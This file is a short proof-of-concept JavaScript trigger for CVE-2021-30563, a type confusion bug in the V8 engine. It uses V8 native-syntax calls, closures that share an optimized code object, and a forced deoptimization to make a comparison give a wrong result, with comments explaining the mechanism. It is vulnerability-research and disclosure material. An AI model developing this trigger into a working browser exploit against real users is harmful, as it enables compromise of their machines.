PoC CVE-2021-30563 - Type Confusion in V8

1. // PoC CVE-2021-30563 - Type Confusion in V8
2. // https://twitter.com/Zeusb0x
3.  
4. // r --allow-natives-syntax
5.  
6. function make() {
7.     const foo = function(x) {
8.         var ab = [shClosure];
9.         if (x > 10) {
10.             temp[0] = 1;
11.         }
12.         return ab[0] === shClosure;
13.     };
14.     return foo;
15. }
16.  
17. // Build the first closure, with function context specialization
18. make();
19. // Build and optimize a second closure.
20. shClosure = make();
21. temp = [1];
22.  
23. // Don't provide feedback for the greater than branch
24. %PrepareFunctionForOptimization(shClosure);
25. shClosure(1);
26. %OptimizeFunctionOnNextCall(shClosure);
27. shClosure(2);
28.  
29. // Build a third closure. This will share the code object with the second closure.
30. fkClosure = make();
31. // Return value is evaluated to a constant true;
32. print(fkClosure(1));
33. // Force deopt.
34. // In the process of translating the native frame to an interpreted one, the JSFunction stack slot is used to represent the closure in question (as part of a captured object).
35. // Because the code object is shared ab[0] will evaluate to fkClosure instead of shClosure in the following call.
36. print(fkClosure(11)); // false
37.  
38.  
39.  
40.  
41.  
42.  
43.  
44.  
45.  
46.  
47.  
48.  
49.  
50.  
51.  
52.  
53.  
54.  
55.  
56.  
57.  
58.  
59.  
60.